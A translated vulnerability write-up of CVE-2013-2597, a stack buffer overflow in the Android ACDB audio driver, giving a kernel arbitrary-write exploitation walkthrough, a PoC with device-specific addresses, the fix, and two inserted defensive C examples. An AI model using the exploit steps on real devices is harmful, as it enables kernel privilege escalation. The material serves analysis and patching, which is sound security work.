Stack-based buffer overflow in the ACDB audio driver (CVE-2013-2597)

Source: Internet
Author: User
Tags cve

/*

This article was written by Mo Gray Ash; please credit the source when reproducing it.

Mo Gray Ash's mailbox: [email protected]

*/

1. Vulnerability description

The ACDB audio driver exposes an IOCTL interface that applications call into, but it does not perform a valid bounds check on the parameters passed in. An application can use the /dev/msm_acdb device file to achieve elevation of privilege.


2. Vulnerability Analysis

The original code is as follows:

    if (size <= 0) {
        pr_err("%s: invalid size sent to driver: %d\n", __func__, size);
        result = -EFAULT;
        goto done;
    }
    if (copy_from_user(data, (void *)(arg + sizeof(size)), size)) {
        pr_err("%s: fail to copy table size %d\n", __func__, size);
        result = -EFAULT;
        goto done;
    }

When handling the ioctl, the acdb driver only checks that the input size is not <= 0; it never checks an upper bound. The call copy_from_user(data, (void *)(arg + sizeof(size)), size) that follows therefore overflows the local stack variable data.

3. Exploitation
1. Original flow: do_vfs_ioctl calls acdb_ioctl, which returns to it.

    do_vfs_ioctl:
        STMPW   [SP], {R4-R9, LR}
        ...
        BL      acdb_ioctl
        ...
        ADD     SP, SP, #$44        // (2)
        LDMUW   [SP], {R4-R9, PC}   // (1)

2. One opportunity to take control of PC is inside acdb_ioctl itself. The registers are restored at (3), and all the values of R4-R11 and PC can be controlled there:

    acdb_ioctl:
        ...
        ADD     SP, SP, #$84
        LDMUW   [SP], {R4-R11, PC}  // (3)

The values of R5, R9 and PC are modified through the stack overflow.
3. With PC controlled by the stack overflow at the instruction above, execution is directed to the following code:

        STR     R5, [R9]            // (4)
        LDMUW   [SP], {R4-R10, PC}  // (5)

This is the key step: the STR instruction stores the value of R5 at the address held in R9, so the stack overflow yields an arbitrary address write.
4. After (5) executes, the stack must be padded with 4*8 bytes to keep it balanced, and then the next PC is set so that execution returns to (2):

        ADD     SP, SP, #$24        // (6)
        LDMUW   [SP], {R4-R9, PC}

5. The actual stack location and the position of p->data require hard-coded adaptation, so p->data[...] must be set up during initialization. The hard-coded addresses are derived from the crash logs that appear on your PC. Filling p->data[i] = i is used as the test pattern (note: the offset is relative to the data label, which makes the position easy to locate from the stack); in this example the PC sits at &p->data[0x9c].

Example:

    acdb=> ACDB IOCTL not found!
    Unable to handle kernel paging request at virtual address 9f9e9d9c
    pgd = df56c000
    [9f9e9d9c] *pgd=00000000
    Internal error: Oops: 80000005 [#1] PREEMPT SMP
    Modules linked in:
    CPU: 1    Tainted: G        W    (3.0.8+1.0.21100-02148-g79e6d0e #1)
    PC is at 0x9f9e9d9c
    LR is at acdb_ioctl+0x740/0x860
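The same Oops is what a defender sees when this overflow is hit in the wild: a PC value that no kernel symbol resolves, while LR still points into acdb_ioctl. The following C triage helper is an added example, not code from the article or from the driver; it runs over a constructed sample assembled from the log lines above (SAMPLE_OOPS) and flags that combination, which is the pattern a corrupted return address leaves behind and distinguishes it from an ordinary driver crash where PC is symbolized.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample built from the Oops quoted in the article (not a captured log). */
static const char *SAMPLE_OOPS =
    "Unable to handle kernel paging request at virtual address 9f9e9d9c\n"
    "Internal error: Oops: 80000005 [#1] PREEMPT SMP\n"
    "PC is at 0x9f9e9d9c\n"
    "LR is at acdb_ioctl+0x740/0x860\n";

/* Return the text after "<reg> is at " on one log line, or NULL if absent. */
static const char *reg_value(const char *line, const char *reg)
{
    size_t n = strlen(reg);
    if (strncmp(line, reg, n) != 0 || strncmp(line + n, " is at ", 7) != 0)
        return NULL;
    return line + n + 7;
}

/* 1 if the value is a bare hex address (nothing symbolized it), 0 otherwise. */
int oops_value_is_bare_address(const char *value)
{
    const char *p = value;
    if (p[0] == '0' && (p[1] == 'x' || p[1] == 'X'))
        p += 2;
    if (!isxdigit((unsigned char)*p))
        return 0;
    while (isxdigit((unsigned char)*p))
        p++;
    return *p == '\0' || *p == '\n' || *p == '\r';
}

/* Scan a whole Oops. Returns 1 when PC is a bare address while LR resolves
 * to a symbol; the LR symbol name (up to '+') is copied into lr_sym and the
 * PC value into *pc when pc is non-NULL. Returns 0 otherwise. */
int oops_pc_hijack_suspect(const char *oops, char *lr_sym, size_t lr_sym_len,
                           unsigned long *pc)
{
    int pc_bare = 0, lr_symbolic = 0;
    const char *line = oops;

    while (*line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        char buf[256];
        const char *v;

        if (len >= sizeof buf)
            len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';

        if ((v = reg_value(buf, "PC")) != NULL) {
            pc_bare = oops_value_is_bare_address(v);
            if (pc_bare && pc)
                *pc = strtoul(v, NULL, 16);   /* base 16 accepts a 0x prefix */
        } else if ((v = reg_value(buf, "LR")) != NULL &&
                   !oops_value_is_bare_address(v)) {
            size_t n = strcspn(v, "+");
            if (n >= lr_sym_len)
                n = lr_sym_len - 1;
            memcpy(lr_sym, v, n);
            lr_sym[n] = '\0';
            lr_symbolic = 1;
        }
        if (!eol)
            break;
        line = eol + 1;
    }
    return pc_bare && lr_symbolic;
}

int main(void)
{
    char sym[64];
    unsigned long pc = 0;

    if (oops_pc_hijack_suspect(SAMPLE_OOPS, sym, sizeof sym, &pc))
        printf("suspect: PC 0x%lx not symbolized, returned from %s\n", pc, sym);
    else
        printf("no hijack signature\n");
    return 0;
}
```

The helper only flags the combination; confirming the cause still requires matching the LR symbol against the vulnerable handler and the patch level of the device.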

6. Set up the stack layout:

    *((unsigned int *)&p->data[0x80]) = value;        // R5: PC - 4*7
    *((unsigned int *)&p->data[0x90]) = address;      // R9: PC - 4*3
    *((unsigned int *)&p->data[0x9c]) = (4) address;  // PC
    *((unsigned int *)&p->data[0xbc]) = (6) address;  // PC + 4*8

4. PoC
    #include <errno.h>
    #include <fcntl.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/ioctl.h>

    static int write_value(const acdb_param *param, unsigned long address, unsigned long value)
    {
        const char *device_name = "/dev/msm_acdb";
        struct acdb_ioctl arg;
        int fd;
        int ret;
        int i;

        fd = open(device_name, O_RDONLY);
        if (fd < 0) {
            ALOGI("failed to open %s due to %s.\n", device_name, strerror(errno));
            return -1;
        }

        arg.size = param->pc2.pos + 4;
        for (i = 0; i < arg.size; i += 4) {
            *(unsigned long int *)&arg.data[i] = i;
        }
        *(unsigned long int *)&arg.data[param->address_pos] = address;  /* R9 */
        *(unsigned long int *)&arg.data[param->value_pos] = value;      /* R5 */
        *(unsigned long int *)&arg.data[param->pc1.pos] = param->pc1.value;
        *(unsigned long int *)&arg.data[param->pc2.pos] = param->pc2.value;

        /* Any ioctl command triggers the stack overflow, and with it the arbitrary address write. */
        ret = ioctl(fd, 9999, &arg);

        close(fd);
        return 0;
    }

The value of param corresponds to the following entry:

    { device_so05d_7_0_d_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },

5. Bug fix
The fix adds an upper-bound check on size.
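As an added illustration (not code from the article or from the driver), the following C program places the check as the article shows it beside a hardened form that also enforces the upper bound. It is a user-space simulation: memcpy stands in for copy_from_user, and ACDB_DATA_MAX is an assumed buffer length, since the article does not state the real size of the on-stack table.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Length of the driver's on-stack table buffer. Constructed value for this
 * example; the article does not state the real buffer size. */
#define ACDB_DATA_MAX 4096

/* The check as the article shows it: only size <= 0 is rejected. */
int acdb_check_size_original(int size)
{
    if (size <= 0)
        return -EFAULT;
    return 0;
}

/* Hardened check: size must be positive and must not exceed the
 * destination buffer, so the copy cannot run past it. */
int acdb_check_size_fixed(int size, size_t data_len)
{
    if (size <= 0 || (size_t)size > data_len)
        return -EFAULT;
    return 0;
}

/* Simulated handler. user_buf holds the argument as user space laid it out:
 * an int 'size' followed by 'size' bytes of table data, mirroring
 * copy_from_user(data, (void *)(arg + sizeof(size)), size) in the driver.
 * Returns 0 or -EFAULT; on success *copied receives the bytes accepted. */
int acdb_ioctl_sim(const unsigned char *user_buf, size_t user_len, size_t *copied)
{
    unsigned char data[ACDB_DATA_MAX];
    int size;

    if (user_len < sizeof(size))
        return -EFAULT;
    memcpy(&size, user_buf, sizeof(size));

    if (acdb_check_size_fixed(size, sizeof(data)) != 0)
        return -EFAULT;
    if (user_len - sizeof(size) < (size_t)size)
        return -EFAULT;          /* the real copy_from_user would fault here */

    memcpy(data, user_buf + sizeof(size), (size_t)size);
    if (copied)
        *copied = (size_t)size;
    return 0;
}

/* Build a request buffer: 'size' header followed by 'size' filler bytes.
 * Returns the total length written, or 0 if it does not fit in out. */
size_t acdb_build_request(unsigned char *out, size_t out_len, int size)
{
    size_t body = size > 0 ? (size_t)size : 0;
    if (out_len < sizeof(int) + body)
        return 0;
    memcpy(out, &size, sizeof(int));
    memset(out + sizeof(int), 0x41, body);
    return sizeof(int) + body;
}

int main(void)
{
    unsigned char req[ACDB_DATA_MAX + 64];
    size_t n, copied = 0;

    n = acdb_build_request(req, sizeof req, 16);
    printf("size 16 -> %d (copied %zu)\n", acdb_ioctl_sim(req, n, &copied), copied);

    n = acdb_build_request(req, sizeof req, ACDB_DATA_MAX + 8);
    printf("size %d -> original check %d, fixed handler %d\n", ACDB_DATA_MAX + 8,
           acdb_check_size_original(ACDB_DATA_MAX + 8), acdb_ioctl_sim(req, n, &copied));
    return 0;
}
```

The signed comparison matters: keeping size as an int and testing size <= 0 first rejects negative values before the cast to size_t, so a negative size cannot wrap into a huge unsigned length in the second comparison.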
Reference articles:
http://retme.net/index.php/2014/03/31/CVE-2013-2597-acdb.html
https://www.codeaurora.org/projects/security-advisories/stack-based-buffer-overflow-acdb-audio-driver-cve-2013-2597
https://gist.github.com/fi01/5857693

